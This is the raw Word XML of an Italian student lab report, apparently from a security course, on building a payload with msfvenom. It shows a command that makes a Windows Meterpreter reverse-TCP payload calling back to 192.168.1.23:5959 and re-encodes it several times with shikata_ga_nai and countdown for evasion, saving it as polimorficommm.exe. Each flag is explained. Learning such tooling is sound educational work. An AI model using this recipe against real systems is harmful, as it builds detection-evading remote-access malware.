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color w:val="0000ff"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ESERCIZIO</w:t>
      </w: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  <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Creazione di un Malware con Msfvenom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 Medium" w:cs="Roboto Slab Medium" w:eastAsia="Roboto Slab Medium" w:hAnsi="Roboto Slab Medium"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Obiettivo dell'Esercizio: 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L'esercizio di oggi consiste nel creare un malware utilizzando msfvenom.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Roboto Slab Medium" w:cs="Roboto Slab Medium" w:eastAsia="Roboto Slab Medium" w:hAnsi="Roboto Slab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Per il compito di oggi ho usato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Msfvenom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, cioè uno strumento incluso nel framework di Metasploit, utilizzato per creare payload personalizzati e generare exploit. Spiegazione comando:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006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highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Prima parte: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8"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p windows/meterpreter/reverse_tcp LHOST 192.168.1.23 LPORT 5959 -a x86 --platform windows -e x86/shikata_ga_nai -i 100 -f raw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msfvenom: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Il comando per generare payloads. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B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-p windows/meterpreter/reverse_tcp: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Specifica il payload. In questo caso, è un payload Meterpreter che stabilisce una connessione inversa TCP. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C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○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windows/meterpreter/reverse_tcp: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Tipo di payload, Meterpreter è una shell avanzata utilizzata da Metasploit. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D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LHOST 192.168.1.23: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Indirizzo IP dell'attaccante dove il payload tenterà di connettersi. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000E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SPORT 5959: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Porta che l'attaccante utilizzerà per ascoltare la connessione inversa.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F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-a x86: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Architettura del payload, in questo caso x86 32 bit. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010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--platform windows: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Piattaforma target, in questo caso Windows. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011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-e x86/shikata_ga_nai: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Codifica il payload utilizzando l'encoder shikata_ga_nai, noto per essere un encoder polimorfico. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012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-i 100: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Indica il numero di iterazioni di codifica da applicare (100 iterazioni). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013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-f raw: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Formato di output, in questo caso raw (grezzo), senza nessun wrapper.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014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 Slab" w:cs="Roboto Slab" w:eastAsia="Roboto Slab" w:hAnsi="Roboto Slab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highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Seconda parte: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Roboto Slab" w:cs="Roboto Slab" w:eastAsia="Roboto Slab" w:hAnsi="Roboto Slab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8"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">| msfvenom -a x86 --platform windows -e x86/countdown -i 200 -f raw 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Roboto Slab" w:cs="Roboto Slab" w:eastAsia="Roboto Slab" w:hAnsi="Roboto Slab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|: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Pipe, utilizza l'output della prima parte come input per il prossimo comando msfvenom. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019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msfvenom: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Di nuovo, utilizziamo msfvenom. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A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-a x86: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Architettura del payload, in questo caso x86 32 bit. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B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--platform windows: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Piattaforma target, in questo caso Windows. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C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-e x86/countdown: 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Codifica il payload utilizzando l'encoder countdown. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D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-i 200: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Indica il numero di iterazioni di codifica da applicare 200 iterazioni). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E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-f raw: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Formato di output, in questo caso raw (grezzo).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Slab" w:cs="Roboto Slab" w:eastAsia="Roboto Slab" w:hAnsi="Roboto Slab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highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Terza parte: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8"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">| msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 138 -o </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Slab" w:cs="Roboto Slab" w:eastAsia="Roboto Slab" w:hAnsi="Roboto Slab"/>
          <w:i w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">polimorficommm.exe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|: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Pipe, utilizza l'output della seconda parte come input per il prossimo comando msfvenom. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023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msfvenom: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Ancora una volta, utilizziamo msfvenom. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024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-a x86: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Architettura del payload, in questo caso x86 32 bit. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025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●-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-platform windows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: Piattaforma target, in questo caso Windows. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026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-e x86/shikata_ga_nai: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Codifica il payload utilizzando nuovamente l'encoder shikata_ga_nai. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027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-i 138: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Indica il numero di iterazioni di codifica da applicare 138 iterazioni). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028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●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-o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polimorficommm.exe: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Specifica il nome del file di output, in questo caso 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polimorficommm.exe.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In sintesi:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A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Prima Fase: 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Genera un payload Meterpreter con una connessione inversa TCP, codificato con shikata_ga_nai per 100 iterazioni. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B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Seconda Fase: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Ricodifica il payload grezzo utilizzando l'encoder countdown per 200 iterazioni. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C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highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Terza Fase: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Ulteriore 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ricodifica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 del payload grezzo utilizzando shikata_ga_nai per 138 iterazioni e salva il risultato finale come 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  <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">polimorficommm.exe.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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="7013850" cy="30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38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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="7013850" cy="234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38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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="7013850" cy="374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38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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="701385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38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highlight w:val="white"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="7013850" cy="163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38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Roboto Slab" w:cs="Roboto Slab" w:eastAsia="Roboto Slab" w:hAnsi="Roboto Sla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1.73228346456693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Slab">
    <w:embedRegular w:fontKey="{00000000-0000-0000-0000-000000000000}" r:id="rId1" w:subsetted="0"/>
    <w:embedBold w:fontKey="{00000000-0000-0000-0000-000000000000}" r:id="rId2" w:subsetted="0"/>
  </w:font>
  <w:font w:name="Roboto Slab Medium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SlabMedium-regular.ttf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoSlab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